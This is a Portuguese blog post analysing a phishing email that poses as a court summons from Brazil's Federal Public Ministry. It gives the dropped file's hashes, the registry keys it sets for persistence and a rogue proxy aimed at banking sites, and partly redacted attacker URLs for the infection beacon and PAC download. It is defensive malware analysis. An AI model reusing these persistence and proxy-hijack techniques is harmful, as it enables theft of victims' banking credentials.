INTIMACAO PARA COMPARECIMENTO EM AUDIENCIA

Recebi em meu e-mail um e-mail supostamente enviado pelo Ministério Público Federal.

Assunto: INTIMACAO PARA COMPARECIMENTO EM AUDIENCIA

Remetente: Ministerio Publico Federal (processos@mpf.gov.br)

Mensagem: Informa sobre uma intimação para comparecimento em audiência e vinha com um “anexo” que ao posicionar o mouse acima do link “PROCESSO 363.234/2012” aponta para um endereço que não tem nada haver com o Ministério Público Federal, MESMO contendo o endereço VERDADEIRO no final do link. Segue abaixo a imagem do e-mail:

Ao clicar no link “PROCESSO 363.234/2012” será feito o download do arquivo Processo363.234-2012.com, vamos analisá-lo.

Arquivo: Processo363.234-2012.com
Packer: ASProtect 1.2x – 1.3x [Registered] -> Alexey Solod
Tamanho: 1929728
MD5: 966334CFB98AE5FFB39717212512AD0E
VirusTotal: 17/43 [Link]

Modifica as seguintes chaves no registro:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\SUROWND: “C:\Boot.exe”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable: “0x00000001 (1)”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL: “file://C:\Unistall.pac”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride: “local”

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\SUROWND: “C:\Boot.exe”

Arquivo: Boot.exe
Packer: –
Tamanho: 1929728
MD5: 3CCAC288B2CE96B2907F4AD1D10EA57C

Esse arquivo Boot.exe é o mesmo do que o “Processo363.234-2012.com”, só que é jogado automaticamente dentro do C:\ com outro nome (Boot.exe).

É feito um post em uma url para avisar via e-mail o criminoso de que mais uma vítima caiu no golpe:
http://www.chaddle…uk/…/novo.php?to=newpharmsb%40gmail.com&subject=%5B%2B%5D%5B1%5D%5BT%5D%5BO%5D%5BN%5D%5BT%5D%5BO%5D-11%3A13%3A25+AM&message=infectado

Traduzindo a url:
http://www.chaddle…/…/novo.php?to=newpharmsb@gmail.com&subject=[+][1][T][O][N][T][O]-11:13:25+AM&message=infectado

É feito o download de um arquivo p.txt:
http://www.chaddle…uk/…/p.txt

Um arquivo Unistall.pac é criado dentro de C:\ e dentro desse arquivo está todo o conteúdo de p.txt.

Como foi mostrado mais para cima, esse arquivo Unistall.pac é setado para funcionar como proxy em determinados sites (principalmente sites de bancos).

Fui verificar o que poderia ter a mais de informações no site www.chaddle…uk e encontrei algumas coisas interessantes, seguem abaixo:

Imagem 1: Pasta com permissão para listar os arquivos, é possível identificar uma pasta (1/) e dois arquivos sendo log.php e novo.php

Imagem 2: Dentro da pasta 1/ é possível visualizar vários arquivos .html (nenhum tem informação dentro) de registros de vítimas, para toda pessoa que tem a máquina infectada é criado um arquivo deste tipo.

Imagem 3: Esta imagem revela informações importantes, é nela que o criminoso verifica a quantidade de vítimas (419 até o momento da análise), a data e a hora em que o arquivo malicioso foi aberto. Esta imagem confirma a imagem acima, onde são os arquivos .html os registros das vítimas. Em apenas DOIS dias (11/02 e 12/02) mais de 400 pessoas executaram o arquivo malicioso.

O arquivo novo.php já foi comentado acima, serve apenas para informar o criminoso sobre uma nova vítima que executou o arquivo macilioso.

Esta análise termina por aqui, onde foi mostrado que o arquivo malicioso tem como objetivo setar um proxy para roubar informações.

Share Button

Comentários

comments

68 Comments

Add a Comment

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Bad Behavior has blocked 67 access attempts in the last 7 days.